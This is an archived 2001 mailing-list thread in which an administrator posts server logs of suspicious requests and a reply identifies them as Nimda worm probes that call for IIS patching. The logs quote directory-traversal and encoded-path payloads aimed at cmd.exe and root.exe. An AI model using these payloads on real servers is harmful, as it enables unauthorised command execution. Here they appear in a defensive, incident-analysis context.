RE: attack on server?

• From: "Smith, Ryan" <RSMITH@xxxxxxxxxxxxx>
• To: "'[ISAserver.org Discussion List]'" <isalist@xxxxxxxxxxxxx>
• Date: Mon, 22 Oct 2001 11:56:25 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Looks like NIMDA worm attacks to me..
 
Hope you're IIS boxes are patched up..
 
Ryan Smith 
Technical Manager 
TransWorld Diversified Services, Inc. 
rsmith@xxxxxxxxxxxxx 

 
 

- -----Original Message-----
From: jose [mailto:pepa@xxxxxxxxx]
Sent: Monday, October 22, 2001 11:50 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] attack on server?


http://www.ISAserver.org


hi all,
 
i have installed on my isa server LANguard.
 
on online monitoring i found followin messsages
 
9:47:09 212.66.172.88 User: [unauthenticated] Size:3396B.
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
9:47:09 212.66.172.88 User: [unauthenticated] Size:3396B.
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
9:47:08 212.66.172.88 User: [unauthenticated] Size:3396B.
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
9:47:08 212.66.172.88 User: [unauthenticated] Size:3396B.
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
9:47:07 212.66.172.88 User: [unauthenticated] Size:3396B.
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
9:47:06 212.66.172.88 User: [unauthenticated] Size:3396B.
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../wi
nnt/system32/cmd.exe?/c+dir
9:47:06 212.66.172.88 User: [unauthenticated] Size:225B.
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
9:47:05 212.66.172.88 User: [unauthenticated] Size:3396B.
/d/winnt/system32/cmd.exe?/c+dir
9:47:05 212.66.172.88 User: [unauthenticated] Size:3396B.
/MSADC/root.exe?/c+dir
9:47:04 212.66.172.88 User: [unauthenticated] Size:3396B.
/scripts/root.exe?/c+dir
 
 
 
its attacks to server or what is it?
 
thanks for every idea
 
 
Josef Kovar
Czech republic
Europe
- ------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List
as: rsmith@xxxxxxxxxxxxx
To unsubscribe send a blank email to
$subst('Email.Unsub') 


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBO9RBqpQ5bLbxjpmmEQJwdQCffzbbb6v/BDXiVOyEPPx89LWUQJQAn2yQ
Nv3ZQOG9umvLmFEeRJoMNOTz
=Gd8s
-----END PGP SIGNATURE-----

Other related posts:

• » attack on server?
• » RE: attack on server?
• » RE: attack on server?
• » Re: attack on server?

1. Home
2. isalist
3. Archive
4. 10-2001

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---